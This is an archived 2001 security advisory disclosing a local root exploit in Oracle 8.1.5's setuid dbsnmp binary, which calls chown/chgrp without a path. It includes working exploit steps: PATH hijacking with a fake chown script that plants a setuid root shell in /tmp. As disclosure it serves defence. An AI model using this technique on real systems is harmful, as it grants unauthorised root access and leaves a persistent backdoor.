The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Oracle 8.1.5 dbnsmp vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 1 Aug 2001 19:14:07 +0200
From: Ismael Briones <[email protected]>
To: [email protected]
Subject: Oracle 8.1.5 dbnsmp vulnerability

Title:         Vulnerability in dbsnmp in Oracle 8.1.5
Date:        01-08-2001
Platform:   Only tested in Digital Unix.
Impact:     Any user can gain root privileges
Author:     Ismael Briones Vilar ([email protected])
Status:     Vendor Contacted, and they are investigating a fix .

PROBLEM SUMMARY:

    There is a problem in dbsnmp that can be used by local users to obtain 
root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there 
is a call to chown and chgrp, but without especify the path, so any user can 
define his PATH variable to exploit this vulnerability:

     Probed in Oracle 8.1.5.
     Oracle 8.1.6 is not vulnerable


IMPACT:

   Any user with local access, can gain root privileges

SOLUTION:

   Maybe a chmod -s

STATUS:

   Vendor was contacted 30/07/2001 and Oracle answer: 

	"We are investigating a fix as we speak."

EXPLOIT:


export PATH=~/bin/:$PATH

Then we create the file ~/bin/chown or ~/bin/chgrp:

#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

(We have to put all in the same line, separated by semicolon)

We make our chown or chgrp executable: 

chmod +x  ~/bin/chown

chmod +x  ~/bin/chgrp

When the user execute dbsnmp, the system look for chown in the first 
directory of the PATH variable, execute our chown file and whe have a shell 
setuid root in /tmp/XXX.


-------------------------
        Ismael Briones Vilar          
        [email protected]        
 

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру